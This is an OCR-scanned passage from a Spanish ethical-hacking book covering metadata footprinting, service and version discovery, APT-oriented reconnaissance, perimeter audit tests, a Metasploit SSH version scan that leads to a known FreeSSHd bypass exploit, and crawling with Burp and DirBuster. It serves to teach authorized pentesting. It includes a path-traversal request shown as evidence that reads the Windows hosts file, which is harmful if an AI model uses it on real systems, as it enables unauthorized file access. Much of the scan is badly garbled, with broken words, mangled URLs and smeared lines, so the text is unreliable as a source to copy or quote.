nrrp://demofaast.elevenpaths.com:9002/metadata/£PXNJ.pdf 


Entran 

Devices. 

Inc. 


http://demofaa5r.elevenpath5.com;9002/metadaia/FIEVVordformat.docx 

hu:p;//demofaa5r.elevenpath5.conn:90C2/metadata/FiEWordfornnat.docx 

Mostrando  de  ’  a  5  de  9 


Uncle  Dan 

Dan 

Budny 


Software  (10) 


Fig.  2.24:  Metadatos  encontrados  en  un  dominio  y  subdominios  dc  una  organizacion. 
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En  la  imagen  anterior  se  puede  visualizar  como  se  presentan  iinos  elemeiitos  basicos  y  fimdamentales 
de  la  etapa  de  footpriuting..  como  son  los  metadatos  de  los  ficheros  ofimaticos  publicados  en  los 
servidores  web  de  la  empresa  objetivo.  Por  cada  uno  de  los  ficheros  encontrados  asociados  al 
dominio  principal  o  a  los  subdominios  del  objetivo  donde  se  comenzo  a  realizar  el  proceso  de 
escaneo,  se  realiza  tin  analisis  completo  en  busqueda  de  cualquier  Riga  de  infonnacion  que  aparezca 
en  los  metadatos  y  que  o  sea  util  en  si  misma  o  que  pennitan  inferir  nueva  infonnacion  a  parlir  de 
ella. 

El  conocimiento  de  los  servicios  de  red  es  algo  fundamental  para  empezar  a  tirar  del  hilo  en  un 
proceso  de pentest.  La  hemamienta  presenta  todos  los  servicios  de  red  de  la  organizacion  encontrados 
en  Internet.  En  muchas  ocasiones  las  grandes  empresas  no  controlan  todas  las  maquinas  y  servicios 
de  red  que  tienen  publicos  en  Internet. 

La  hemamienta  permite  conocer  que  recursos  estan  disponibles  de  fonna  publica  o  privada  en 
Internet,  lo  cual  ayuda  a  conocer  mejor  el  estado  actual  de  la  infraestructura,  y  si  esta  se  encuentra 
obsoleta  en  cuanto  a  versiones  o  malas  configuraciones  que  los  admin istradores  hayan  podido  dejar 
en  el  dia  a  dia. 


Jo  -  ::  :  d^d=f:  -i  -  '  i'  :  Servicios  de  rgd  f 

HTTP 


BRc^Lt^dteL 


5  ▼  Registros  por  pagina  Buscar: 


Recurso 

^  Dlreccianes  IP 

PuetTO 

Software 

demofaast.elevenpaihs.com 

168.63.36.236 

9002 

.Apache  2.4.4 

demofaast,elevpnpaihs.conn 

168.63.36.236 

SO 

Microsoft  HTTP  API  heepd 

Moscrando  de  *  a  2  de  2 

•  ■'•^•.'1.-’  •  'I-: 

HTTPS 

Fig.  2.25:  Sen  icios  de  red  encontrados  cn  un  cscaneo. 

Las  versiones  de  software  que  se  pueden  obtener  en  el  proceso  requieren  de  un  estudio,  ya  que 
pormiiiran  determinar,  por  ejemplo,  si  existe  algun  tipo  de  exploit  publico  o  no  -  puede  que  se 
conozca  la  existencia  de  un  exploit  pero  este  haya  ido  vendido  a  un  tercero  que  no  lo  ha  liberado, 
o  quo  se  sepa  que  se  ha  explotado  publicainente  pero  no  este  disponible  para  todo  el  mundo  -  para 
dicho  software. 
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Tambien  permite  conocer  el  software  que  iitiliza  la  empresa.  algo  que  es  de  gran  utilidad  ya  qiie  se 
podra  utilizar  es  informacion  en  un  posible  ataque  dirigido  tipo  APT  o  en  un  alaque  de  ingeniena 
social  en  el  que  se  use  esa  informacion  para  ganarse  la  confianza  de  la  persona  que  vaya  a  sei 
utilizado  como  victima. 

Ademas,  el  conocer  que  sofhvare  tiene  la  empresa  lambien  puede  sigmficar  un  incidente  reputacional 
ante  una  posible  auditoria  de  licencias  se  puede  utilizar  dicha  infomiacion.  En  la  imagen  se  puede 
visualizar  que  muestra  el  servicio  en  su  apartado  de  software.  _ 


•IdOd  db  A'-'.l’diTE  ‘JlLldrldt’E 

Microsoft  HTTPAPi  2.C 
Apache  2AA 

Dominio  H) 

demofaasi, elevenpaths.com 
Puerto  (1) 

90D2 

Serviclos  de  red  (1) 

HTT^ 

URLs 


OpenSSL  O.Q.Sy 
PHP5A19 

Acrobai:  Distillier  8.1.0 
Microsoft  HTTPAPI  httpd 
nginx 

Microsoft  Onice  2007 
QuarkXPress  8 
Acrobat  Disiillier  3.02 
Microsoft  Office 


br-i  d 


Softt'vare 


-ri-'ies 


Fig.  2.26:  Versiones  dc  soflyvcire  cncontradas  en  un  escaneo. 

For  ultimo  el  servicio  es  capaz  de  obtener  un  gran  numero  de  vulnerabilidades,  recomendaciones  y 
notificaciones  extraidas  del  analisis  y  pruebas  realizadas  con  el  mapa  de  informacion  obtemdo  en 
proceso  de  descubrimiento. 


Capitulo  IL  La  informacion  es  poder 


En  la  imagen  siguiente  se  puede  visualizar  la  lista  de  las  vulnerabilidades  encontradas  en  la  ejecucion 
de  un  ciclo  complete  de  pentest  sobre  un  dominio  dado  ordenadas  por  grado  de  cnticidad  iisando  un 
codigo  de  colores  visual 


Vulnerabilidades 

0  Vulnerabilidad  Conocida 
El  SQL  Injection 
H  Cross-sice  Scripung 
S  HTML  Injection 
HI  Path  Traversal 

9  RFI 

SI  Command  injection 
9  O/E-2012-iS23 

G  -1 

□  Desktop.ini 

D  Gir  do'/vnloader 

□  VVS.FTP.Log 

Fig.  2.27:  Vulnerabilidades  con  el  mapa  dc  inlbriTiaeion. 

Para  enlender  mejor  como  funciona  este  sistema,  en  la  imagen  de  la  pagina  siguiente  .sc  muestra  a 
tnodo  dc  cjemplo  el  detallado  o  cvidencia  que  se  presenta  cuando  es  descubierta  una  vulnerabilidad 
l.l’L  Local  File  Inclusion,  la  cual  fue  dcscubieila  a  traves  de  una  biisqueda  activa  de  recursos  en 
liUernel. 

Tras  analizar  toda  la  informacion  obtenida  a  traves  del  escaneo  automatico  con  la  herramienta  sc 
rcalizan  pruebas  de  pentest  como  esta,  y  se  obtienen  resultados  que  deberan  ser  incluido  como  parte 
del  informe  de  resultados  que  se  entreguc  al  final,  o  como  parte  de  sucesivas  pruebas  de  intrusion 
quo  se  apoyen  en  eta  vulnerabilidad  para  continuar  midiendo  el  riesgo  del  sistema. 

bl  serv'icio  detalla  los  pasos  llevados  a  cabo  durante  todo  el  proceso,  que  van  desde  el  momento  en 
que  se  adquiere  la  informacion  inicial,  pasando  por  como  es  adquirida  y  llegando  hasta  el  punto  de 
como  se  logra  obtener  un  privilegio  de  ello  o  detectar  una  vulnerabilidad,  independientemente  de 
la  criiicidad  de  esta.  En  la  imagen  se  visualiza  la  evidencia  de  la  vulnerabilidad  de  LFI  que  se  ha 
comeniado  en  este  apartado. 
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Evidencia 

GET  /pathtraversal/ptraversal. php?archivo=C3b3A3S2rwindcws%2r5y5teni32^'2rdr 

iver5%2Fetc^2Fh05t5  HTTP/1.1 

User-Agent :  864cc0cd-8045-4862-b8da-249S4d80a3dd 
Host ;  den-.of aast . elevenpaths . com: 9002 
Connection:  Close 


#  Copyright  (c)  1993-2009  Microsoft  Corp. 

# 

#  This  is  a  sample  HOSTS  file  used  by  Microsoft  TCP/IP  for  Windows. 

# 

#  This  file  contains  the  mappings  of  IP  address 

Fig.  2.28:  Evidencia  obtenida  de  iina  viilnerabilidad. 


4.  Orientando  el  pentesting  hacia  un  APT 

Tras  la  creacion  del  mapa  de  informacion  en  las  primeras  fases  de  un  pentesl  se  ha  enconlrado 
informacion  qiie  puede  ser  util  en  otros  entornos.  Por  ejemplo,  la  iiitormacion  de  lutas  internas, 
correos  electron icos  o  numeros  de  identificacion  DNl  que  puedan  aparecer  en  metadatos,  etcetera, 
puede  ser  utilizado  en  los  denominados  APT como  punto  de  partida  o  semilla  que  pueda  ayudar  a  los 
auditores  en  estc  tipo  de  pruebas. 

Hoy  en  dia  la  seguridad  de  las  empresas  depende  de  muchos  factores,  y  es  conocido  que, 
generalmenle,  el  eslabon  mas  debil  es  cl  usuario.  De  estc  modo  el  pentesting  puede  evolucionar  y 
llegar  a  las  pruebas  a  los  empleados,  ya  que  en  ocasiones  puede  ser  la  via  mas  factible  paia  conseguir 
el  exito.  En  un  proceso  de  hacking  etico  existe  el  APT.  del  cual  se  hablara  en  profundidad  durante 
el  proximo  capitulo. 

Es  cierto  que  un  pentest  ofreee  la  posibilidad  de  realizar  pruebas  de  intrusion  en  sistemas,  aunque 
si  un  atacante  quiere  vulnerar  una  organizacion  quiza  el  camino  mas  corto  sea  la  utilizacion  de  un 
empleado  para  acceder  al  interior.  Por  esta  razon  la  vision  global  del  pentesling  puede  aumentar,  y 
gracias  al  mapa  de  informacion  generado  en  las  primeras  fases  del  pentest  se  podria  utilizar  dicha 
informacion  para  otro  tipo  de  pruebas. 

Ademas,  se  puede  entender  que  una  vision  global  no  se  centra  en  lo  que  la  empresa  expone  en 
Internet,  si  no  en  la  necesidad  de  concienciar  y  poner  controles  para  que  los  empleados  no  hagan  que 
la  inversion  en  seguridad  no  sea  util. 
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Sin  entrar  en  detalle  porque  ya  se  hablara  de  ello  en  el  proximo  capitulo,  comentar  que  un  APT. 
Advanced  Persistent  Threat,  es  un  conjunto  de  ataqiies  informaticos  que  sucederan  de  manera 
continua  contra  una  persona  o  conjunto  de  personas  de  interes. 

El  objetivo  de  los  atacantes  es  conseguir  informacion  o  datos  de  valor  que  puede  tener  una  persona, 
organizacion  o  gobiemo.  Por  esta  razon,  se  debe  tener  en  cuenta  que  las  personas  que  rodean  a  la 
persona  que  tiene  bajo  su  control  dicha  infonnacion  tambien  pueden  ser  objetivo  de  un  APT,  ya  que 
a  traves  de  estas  personas  se  puede  llegar  al  objetivo  final. 

Se  resume  que  un  APT  consta  de  tres  vertientes: 

-  Es  un  proceso  avanzado.  No  siempre  se  utilizan  tecnicas  avanzadas  para  lograr  los 
objetivos,  aunque  en  muchas  ocasiones  se  necesitan  varies  desencadenantes  o  condiciones 
para  que  el  ataque  tenga  exito. 

-  Es  un  proceso  persistente.  Se  hace  un  seguimiento  del  objetivo,  intentando  monitorizar 
acciones,  clasificar  comportamientos  en  el  mundo  digital,  incluso  fuera  de  el,  y  realizando  un 
profiling  de  la  persona. 

-  Es  un  proceso  basado  en  las  amenazas  del  mundo  digital.  Un  usuario  esta  expuesto  a  mas 
amenazas  cada  dia.  De  este  modo  los  empleados  de  una  organizacion  tambien  lo  estaran. 

;.Qiie  elementos  pueden  ser  interesantes  para  un  APTl  Como  se  ha  mencionado  antcriormente 
en  un  proyecto  de  pentesting  se  pueden  obtener  elementos  como  metadatos,  correos  electron  icos 
personales  y  profesionales,  direcciones  IP,  luimeros  de  telefono,  de  DNl,  identificaciones  intemas 
de  empleados,  etcetera.  Por  si  solos,  o  sin  un  contexto,  tal  vez  pueden  no  decir  demasiado  a  priori, 
pero  pueden  ser  utilizados  de  la  forma  adecuada  para  potenciar  el  impacto  de  un  ataque  dirigido  en 
un  esquerna  de  APT. 

En  otras  palabras.  existe  una  relacion  bidireccional  entre  elementos  de  un  pentest  que  pueden 
.scr  utilizados  en  un  proceso  de  APT.  Esto  hace  que  el  seguimiento  de  una  persona  o  profiling  no 
comience  de  cero. 


PoC:  Obteniendo  correos 

Un  ejemplo  claro  de  lo  comentado  anteriormente  es  la  obtencion  de  correos  electronicos  para  realizar 
profiling.  En  un  pentest  esto  puede  ser  util  para  conocer  correos  electronicos  y  realizar  pruebas  dc 
fortaleza  de  contrasehas  mediantc  el  uso  de  un  diccionario  basico.  Pero  estos  con*eos  electronicos 
pueden  ser  utilizados  en  un  proceso  de  APT. 

En  este  capitulo  ya  se  ha  visto  como  conseguir  coireos  electronicos  en  Internet.  Se  sabe  que  se 
pueden  utilizar  diversos  medios.  La  utilizacion  de  los  motores  de  busqueda  como  Google.  Bing  o 
Exalead  es  una  via  muy  recurrida  por  las  herramientas  que  anuncian  estas  funcionalidades.  Algunas 
de  las  herramientas  mas  potentes  para  lograr  esto  son  the  harvester  y  maltego. 

Estas  herramientas  estan  disponibles  en  la  distribucion  Kali  Linux. 
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Capitulo  III 

Confeccionando  el  ataque 


l.Entornos 

En  el  presente  capitulo  se  presentan  distintas  tecnicas  basadas  en  experiencias  y  conocimientos 
teorico-practicos.  El  capitulo  pretende  mostrar  los  diferentes  entomos  a  los  que  se  enfrenta  un 
auditor  de  seguridad  en  cualquier  proceso  de  Ethical  Hacking.  La  confeccion  del  ataque  supone  uno 
dc  los  pasos  importantes  y  clave  de  toda  auditoria,  es  importante  entender  el  entomo  en  el  que  el 
auditor  se  mueve  para  poder  preparar  la  mejor  estrategia  para  lograr  el  exito, 

Es  sabido  por  todos  que  en  esta  fase  del  proyecto,  lanto  el  conocimiento  como  la  experiencia  es  todo 
un  grado,  y  que  aunque  existe  parte  procedimental  para  llevar  a  cabo  las  distintas  pruebas  y  etapas. 
los  pequefios  detalles  pueden  aportar  la  diferencia  entre  tardar  una  jornada  en  hacerse  con  el  servidor 
requerido  o  perder  tres  jomadas  con  ello. 

El  estudio  del  entomo  es  algo  indispensable  para  que  la  prueba  pueda  llegar  a  buen  puerto,  el 
conocimiento  de  las  plataformas  y  tecnologias  hace  que  el  auditor  disponga  de  un  punto  de  ventaja 
IVente  a  otro  que  las  debe  aprender  a  priori.  Por  ello,  el  equipo,  como  se  ha  comentado  en  estc  libro. 
debe  disponer  de  varios  expeitos  en  diferentes  platafonnas  y  tecnologias.  Este  hecho  da  un  punto  a 
favor  a  la  empresa  que  ofrece  el  servicio  para  realizar  el  proceso  de  Ethical  Hacking. 

La  refle.xion  durante  la  ejecucion  de  las  pruebas  es  importante,  ya  que  tras  un  dia  largo  de  trabajo 
puede  resultar  indispensable  pensary  analizarsobre  lo  obtenidoy  los  objetivos  a  lograr.  Es  importante 
que  las  reflexiones  scan  diarias,  tener  reuniones  de  equipo,  evaluar  lo  conseguido  para  poder  analizar 
lo  que  se  ha  logrado  e  intentar  obtener  los  objetivos  optimizando  recursos. 


2.  Auditoria  perimetral 

Las  auditorias  perimetrales  permiten  a  un  auditor  conocer  el  estado  de  seguridad  del  perimetro  de  la 
organizacion  analizando  las  posibles  entradas  del  exterior  hacia  la  DMZ y  zonas  intemas.  El  auditor 
no  conoce  la  configuracion  del  perimetro,  por  ello  se  denomina  algunas  veces  auditoria  ciega,  y  se 
estudiara  el  estado  de  seguridad  de  los  elementos  que  se  pueden  analizar  desde  el  exterior.  El  objetivo 
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final  de  la  auditon'a  es  obtener  acceso  a  la  red  interna  de  la  organizacion  o  a  la  D,'V/Z,  asi  conic 
obtener  informacion  interna  y  detectar  vulnerabilidades  que  pongan  en  peligro  la  infoiTnacion  de  la 
organizacion.  Gracias  a  este  tipo  de  auditoria  se  dispone  de  iina  primera  vision  de  vulnerabilidades 
existentes  en  el  perimetro  para  una  posterior  coiTeccion  de  ellas. 

Es  importante  entender  que  en  este  tipo  de  auditorias  la  imagen  corporativa  de  la  organizacion 
auditada  esta  en  juego,  ya  que  si  el  auditor  o  grupo  de  auditores  consiguen  obtener  informacion 
de  caracter  privado  sera  una  mancha  importante.  Las  pruebas  a  realizar  en  este  tipo  de  auditorias 
dependen  tambien  de  los  elementos  o  servicios  que  se  encuentren  en  el  perimetro,  aunque  se  puede 
realizar  un  listado  con  pruebas  genericas  sobre  dicha  tematica.  En  lineas  generales  el  resultado  final 
de  este  tipo  de  auditorias  permitira  conocer  lo  siguiente: 

-  Vulnerabilidades  que  puedcn  ser  explotables  desde  el  exterior  de  la  organizacion. 

-  Las  consecLiencias  de  este  tipo  de  vulnerabilidades. 

El  grupo  de  auditores  deben  proporcionar  una  serie  de  recomendaciones  para  paliar  las 
vulnerabilidades  detectadas  en  este  proceso. 

El  cliente  recibe  un  informe  deiallado  sobre  el  status  de  seguridad  de  los  elementos  que  se  encuentran 
accesibles  publicamente,  y  los  elementos  de  seguridad  a  los  que  un  usuario  en  el  exterior  se  puede 
enfrentar. 


Pruebas 

Este  tipo  de  auditorias  donde  se  depende  mucho  de  los  servidores  y  servicios  que  una  organizacion 
disponga  en  el  perimetro  pueden  lener  diferentes  tipos  de  pruebas  debido  a  la  helerogeneidad  del 
entomo.  For  esta  razon,  se  pretendc  presentar  una  especie  de  procedimiento  donde  se  indiquen 
pruebas  que  en  la  mayoria  de  los  casos  se  puedan  llevar  a  cabo  independientemente  del  tipo  de 
entorno. 

A  continuacion  se  expone  el  conjunto  de  prueba  que  despues  ,se  detallara: 

Identificacion  de  servicios.  La  determ inacion  de  servicios  mediante  lecnicas  de 
fingerprinting  para  obtener  ideas  y  analizar  vias  por  donde  atacar  la  seguridad  de  los  distintos 
servicios. 

Analisis  de  vulnerabilidades,  recopilacion  y  ejecucion  de  exploits. 

-  Analisis  de  informacion.  Tras  la  recogida  de  esta  se  debe  realizar  un  analisis  y  primeras 
pruebas.  La  realizacion  de  tecnicas  de  fuzzing  y  crawling  ayudan  a  completar  los  mapas  de 
informacion.  Los  puntos  de  entrada  deben  ser  encontrados  y  verificar  la  seguridad  de  estos. 
Analisis  de  meladatos. 

-  Analisis  de  codigo. 

Deteccion  de  malas  conliguraciones  y  exposiciones  no  deseadas  por  la  organizacion. 
Deieccion  y  explotacion.  Realizacion  de  analisis  del  protocolo  SSL,  manipulacion  de 
parametros,  analisis  de  cookies  y  utilizacion  de  tecnicas  de  hacking  web. 


Capitulo  III.  Confeccionando  el  atacjiie 


79 


Es  dificil  realizar  un  procedimiento  de  pruebas  para  este  tipo  de  auditorias,  ya  que  hay  que  tener 
claro  que  las  nuevas  tecnicas  se  deben  incorporar  sienipre  para  mejorar  las  pruebas  realizadas  en  las 
auditorias  perimetrales.  Ademas,  las  pruebas  sienipre  dependeran  de  los  seiwicios  que  la  organizacion 
tenga  expuestos  hacia  el  exterior. 

En  el  presente  apartado  se  tiende  a  centrarse  en  pruebas  cercanas  a  sitios  web,  aunque  algunas  son 
generales  para  otros  servicios. 


Identificacion  de  servicios 

Esta  es  una  de  las  primeras  acciones  que  se  deben  llevar  a  cabo,  y  es  que  se  necesita  identificai 
que  servicios  se  encuentran  expuestos  con  el  exterior  de  la  organizacion.  En  otras  palabras,  el 
conocimiento  de  los  servicios  perimetrales  de  la  organizacion  proporcionaran  al  auditor  una  vision 
de  que  cosas  tiene  que  probar  y  le  proporciona  una  primera  idea  de  que  cosas  puede  atacai  y  como 
llevarlo  a  cabo. 

Para  llevar  a  cabo  el  descubrimiento  dc  maquinas  que  puede  tener  la  organizacion  en  la  parte  externa 
del  perimetro  se  utiliza  herramienlas,  como  las  mencionadas  en  el  capitulo  anterior.  Simplcmente 
recordar  que  lien  amientas  como  Packet  permiten  obtener  un  mapa  de  lodo  recurso  de  la  organizacion 
quo  sc  encLientra  expueslo  en  Internet.  Sin  nombrar  que  esta  herramienta  es  tambien  capaz  de  sacar 
datos  del  interior,  gracias  a  fugas  de  informacion. 

En  el  capitulo  anterior  se  trato  el  tema  dc  fingerprinting,  por  lo  que  en  este  apaitado  se  evita  volver 
a  tratar  lo  mismo.  La  deteccion  de  servicios  y  versiones  de  productos  que  se  encuentran  a  la  escucha 
en  los  puertos  de  los  equipos  es  un  paso  importante,  ya  que  una  de  las  primeras  cosas  a  realizar  es 
biuscar  si  dichas  versiones  descubiertas  se  encuentran  actualizadas  y  sin  vulnerabilidades  conocidas. 
.'\  continuacion  se  presenta  un  listado  de  sitios  web  donde  buscar  exploits  para  los  resultados 
obtenidos  en  esta  identificacion: 

-  El  primer  sitio  serian  los  propios  buscadores  de  Internet,  como  Google.  Bing.  Yahoo.  En 
muchas  ocasiones  el  e.\ploil  podra  ser  enconlrado  mediante  estas  vias. 

-  El  sitio  w'eb  e.xploit-db.coin.  el  cual  ya  se  ha  nombrado  en  este  libro.  Este  sitio  web 
proporciona  una  clasificacion  de  exploits  por  categorias,  indicando  si  el  exploit  es  local, 
remoto,  causa  la  caida  del  servicio,  etcetera. 

El  sitio  web  seciirit\fbciis.coin,  el  cual  proporciona  una  categoria  muy  grande  de 
plataformas  sobre  las  que  existen  vulnerabilidades,  y  ademas  indica  si  hay  o  no  un  exploit 
disponible. 

El  sitio  'wch  packetsturmseciiriiy.com.  el  cual  es  similar  a  los  anteriorcs  piopoicionado 
exploits  por  versiones  de  producto. 

-  El  sitio  web  I337day.com,  el  cual  es  similar  a  los  anteriores,  pero  ademas  hay  exploits  de 
pago.  Este  sitio  aporta  esta  nueva  vertiente  de  pago,  con  la  que  en  muchas  ocasiones  se  debe 
contar  para  simular  correctamentc  el  punto  de  vista  de  un  atacante. 

Por  ultimo,  nombrar  a  \&deep  M-e/rcomo  fuentede  busqueda  de  este  tipo  de  flincionalidades. 
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Hay  que  tener  en  cuenta  que  en  el  hacking  etico  se  debe  tener  un  control  total  de  la  situacion  en  to  o 
momento,  ya  que  la  infraestructura  de  la  organizacion  que  ha  contratado  los  servicios  no  puede  sutrii 
danos  reales.  Por  esta  razon,  no  se  deben  lanzar  exploits  que  no  hayan  sido  venficados  a  conciencia 
y  se  tenga  un  conocimiento  total  sobre  lo  que  este  realiza.  El  porque  es  senciHo,  si  el  auditoi  no 
sabc  lo  que  esta  ejecutando,  la  maquina  destino  de  dicha  accion  puede  sufnr  danos,  por  ejemplo  set 
“troyanizada”,  por  los  que  el  equipo  de  auditoria  debeiia  lespondci. 

La  herramienta  Nmap  permite  realizar  fingeiprinting  sobre  las  maqumas  penmetrales  de  la 
organizacion,  pero  para  este  tipo  de  acciones  se  pueden  utilizar  escaneres  que,  ademas,  permitan 
verificar  las  vulnerabilidades  que  pueden  tener  dichas  maquinas.  Herramientas  conio  Nessns  o 
Nexpose  penniten  llevar  a  cabo  este  tipo  de  acciones  realizando  un  reporte  de  vulnerabilidades  que 
pueden  tener  los  sistenias  debido  a  versiones  no  actualizadas  y  que  ponen  en  peligro  la  seguiidad 
del  sistema. 

Este  tipo  de  escaner  tiene  un  comportamiento  que  va  mas  alia  de  un  simple  scan  de  vulnerabilidades. 
Se  pueden  configurar  para  que  utilizando  credenciales  proporcionadas  por  la  empresa  pueda  acceder 
al  interior  del  sistema.  a  traves  por  ejemplo  de  SSH  o  SMB,  y  pueda  realizar  una  mejor  exploracion 
en  busca  de  vulnerabilidades,  malas  configuraciones,  etcetera. 

Por  ultimo,  indicar  que  estos  escaneres  preseniar  inlbrmes  o  reportes  interesantes  con  lo  que 
se  ha  conseguido,  pero  que  ademas  pueden  exportar  sus  resultados  a  formatos  como  XML  para 
posteriormente  ser  integrados  con  herramientas  de  explotacion.  Esta  caracteristica  proporciona  un 
mayor  grado  de  flexibilidad  y  aiitomatizacion  en  cl  proceso  de  la  auditoria.  Aunqiie.  nuevamente,  se 
debe  recordar  que  la  aulomalizacion  es  algo  necesaria  por  los  tiempos  del  mercado,  pero  que  debe 
ser  monitorizada  y  supervisada  por  un  auditor  con  experiencia  que  pueda  comprobar  manualmente 
los  reportes  que  se  oblienen. 

PoC:  Identificacion  de  vulnerabilidad  explotable 

Rn  esta  prueba  de  concepto  sencilla  y  rapida  se  sinuila  un  escaneo  sobre  un  servdcio  SSH  en  una 
maquina  Microsoft  Windows.  Con  un  modulo  anxilkny  framework  de  Metasploit  se  consigue 
realizar  un  fingerprint  y  se  obtiene  la  version. 

En  la  siguiente  imagen  se  puede  visualizar  como  el  auditor  obtiene  la  siguiente  cadena  SSH-2.0- 
WeOnlyDo  2.13".  El  numero  2.0  indica  que  el  protocolo  SSH  es  dicha  version,  pero  WeOnlyDo 
2. 1.3  "  puede  no  dar  tantas  pistas  a  priori. 

Tisf  auxiliary ( smb_ version)  >  use  auxillary/scanner/5sh/5sh_version 

Tisf  auxiliary(ssh_version)  >  set  RH05TS  10.0.0.2 

IHOSTS  =>  10.0.0.2 

msf  auxiliary{ssh_version)  >  run 

[*J  10.0.0.2:22,  SSH  server  version:  SSH -2.0 -WeOnlyDo  2.1.3 
LM  Scanned  1  of  1  hosts  [100%  complete) 
r*]  Auxiliary  module  execution  completed 

Tisf  auxiliary (ssh  verslon)  >  | _ 


Fig.  3.01:  Identificacion  de  version. 
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Tras  recoger  esta  infonnacion  se  puede  buscar  en  Google,  con  el  fin  de  encontrar  mayor  informaeion. 
El  resLiltado  que  arroja  el  buscador  indica  la  existencia  de  un  exploit  para  la  aplicacion  FreeSSHd.  la 
dial  es  la  que  implementa  "WeOnlyDo  2. 1.3 


La  verdad  es  que  si  se  visual iza  el  sitio  web  de  FreeSSHd  se  puede  visualizar  que  la  ultima  version, 
a  mediados  del  aho  2014,  es  la  1 .2.6  y  que  el  exploit  afecta  a  todas  las  versiones,  incluida  esta.  ^;Es 
un  0-day?  En  su  dia  esta  claro  que  si,  y  aunque  ahora  es  muy  conocido  sigue  siendolo,  ya  que  una 
organizacion  que  tenga  dicha  aplicacion  instalada  es  vulnerable. 


ssh-2.0  weonlydo  2.1.3  exploit 


Web  Imagenes  Maps  Shopping  Mas  -  Herramientas  de  biisqueda 
Aciroximadarnenle  699  resultados  segundos) 

FreeSSHD  Remote  Authentication  Bypass  Zerodav  Exploit 

vAV\v.explolt*db.com/exploits/23...  -  Estados  Unidos  -Traducir  esta  p^gina 
02/12./2012  -  FreeSSHD  Remote  Authentication  Bypass  Zeroday  Exploit ...  banner  of 
the  most  recent  version  is:  SSH-2.0-WeOnlyDo  2.1.3  For  your  pleasure.  ... 

Freesshd  Authentication  Bypass 

'.‘A'Av.exploit-db.com/exploits/24...  -  Estados  Unidos -Traducir  esta  p^gina 
15/01/201 3 -The  exploit  has  been  tested  with  both  password  and  public  key 
authentication.  ...  disconnect  If  banner  =-  /SSH-2.0-WeOnlyDo/  version=banner.splitr 
'')[11  ...  if  version  =-  /(2.1.3|2.0.6)/  return  Exploit::CheckCode::Appears  end  ... 


Fig.  3.02:  Descubrimicnlo  dc  exptoii  O-day. 


Analisis  de  informaeion 

En  cslc  apartado  se  exponen  diferentes  pruebas  y  lecnicas  para  realizar  un  analisis  de  informacicSn 
y  obtener  un  mayor  numero  de  recursos  sobre  los  que  realizar  otras  pruebas.  Por  ejemplo  en  este 
apartado  se  trataran  tecnicas  como  la  fuei'za  bruta  y  el  crawling  con  el  fin  de  encontrar  y  analizar  un 
mayor  numero  de  recursos.  completando  los  ansiados  mapas  de  informaeion.  Los  puntos  de  entrada 
a  servicios  son  encontrados  en  esta  fase.  El  analisis  de  metadatos  y  de  codigo  de  aplicativos  tambien 
puede  .ser  llevado  a  cabo  en  esta  fase,  por  lo  que  se  hablara  mas  delantc  de  ello.  Analisis  de  cabecera. 
deleccion  de  posibilidad  de  clickjacking,  metodos  HTTP,  deteccion  de  malas  configuraciones.  leaks 
en  la  propia  informaeion,  listados  de  doniinios,  viitual  hosts,  etcetera,  puede  ser  analizado  cn  esta 
lase  de  la  auditoria. 


Crawling,  brutefoice  y  otras  tecnicas 

Para  poder  llevar  a  cabo  un  analisis  de  informaeion  sobre  las  aplicaciones  y  servicios  web  hay 
qtic  realizar  tecnicas  de  crawling  y  fuei'za  bruta  para  encontrar  el  mayor  numero  de  activos  o 
clenientos  que  deben  ser  auditados.  Algunas  veces  existen  otros  elementos  que  pueden  aportar 
mucha  informaeion  y  que  deben  ser  analizados  y  tenidos  en  cuentas.  En  este  apartado  se  pretende 
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proporcionar  una  lista  de  tecnicas  y  acciones  a  llevar  a  cabo  para  poder  obtener  la  mayor  intormacion 
para  su  posterior  analisis. 

El  crr/M’/me  es  la  primera  tecnica  que  se  debe  tener  en  cuenta  y  que  seguro  se  utilizara  con  las 
aplicaciones  web  que  esten  publicas  y  accesibles  desde  Internet.  Es,  ademas,  una  accion  tviden  y 
oL  leer  los  codigL  fuentes  de  los  sitios  web  publicos  y  almacenar  y  seguir  todos  los  enlaces  o  links 
Te  se  van  enctn^an^^^  parece  una  operacion  logica.  Con  esta  tecnica  se  puede  construir  todo  u„ 
mapl  del  sitio  web,  aunque  no  todas  las  direcciones  URL  pueden  quedar  capturadas,  ya  que  pucden 
existir  rutas  no  enlazadas  en  el  sitio  web. 

Existe  multitud  de  heiramientas  para  realizar  crawling,  por  ejemplo  Burp  Suite  con  la  que  se  puede 
LTecta  a  Wsqtda  de  URL  con  otras  herramientas.  El  modulo  de  spidenng  que  proporc.ona  la 
hema^rgenra  Lltados  aceptables  devolviendo  un  ftchero  con  todas  las  rutas  a  arclnvos  de 

Lin  sitio  web.  _ 


burp  intruder  repeater  window  help _ _ _ 

reoeater  I  sequencer  I'  decoder  |'~c^pare7]  optlons7~alertsj_ 
— I  spider^ _ scanr^ 


intruder 


intercept  |  options  ~|  history  | 


Filter,  hiding  CSS,  image  and  general  binary  content 


4 

56 


host 


mm 


method 


URL 


http:/ywww.gQogle-an 


http :// WWW,  g  Q  0  gl  e  .e  s 


httpJM 


fe/ 


add  item  to  scope 
remove  item  from  scope 


:?allcomments=true&autor.. 


acti’.'el .  scan  this  it-?m 
scan  this  ilei'' 
send  to  intruder 
send  to  repeater 


Fig.  3.03:  Cmwling  con  Burp  Suite. 

enJava.  perteneciente  a  de  clickjacking,  m^odos  HTTP,  detecc.on  de  malas. 

La  hen-amienta  DirBusler  dispone  de  millones  de  peticiones.  ya  que  tiene 

rutas  de  una  uran  cantidad  de  aplicaciones  web.  De  este  modo,  el  audi  or  p  verifiouen'^que 

de  que  se  csc^anea  un  espectro  de  posibilidades  y  rutas  de  di-ctor.os  y 

no  queda  algo  que  sea  accesible  desde  Internet  y  que  no  se  contempk  Logicamenie  cl 

d:  esta  beiimlenta  no  es  un  proceso  agil  y  tiene  un  coste  de 

de  elementos  de  seguridad  que  puedan  hanear  la  conexion.  por  o  que 

dirercion  IP  del  auditor  ha  sido  excluida  de  dichos  elementos  de  seguridad. 
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List  View Tree  View' 


T^e_ 


Found 


Dir 

Dir 

Dir 

Dir 

Dir 

pir_ 

Dir 

Dir 

Dir 

Dir 

Dir 

Dir 

Dir 

Dir 


/cgi-biny 

/icons/ 

/doc/ 

/check/ 


/wordpress/wp-content/  200 

/wordpressM'p-content/themes/  200 

/wordpress/wp-content/themes/tvventyeleven/  500 
,/wordpress/wp-content./themes/twentyelevea1, ..  200 
/wordpress/wp-content/themes/twentyeleven/L.  200 
/wordpressMp-content/plugIns/  200 

/wordpress/wp-content/plugins/resume-submis...  200 
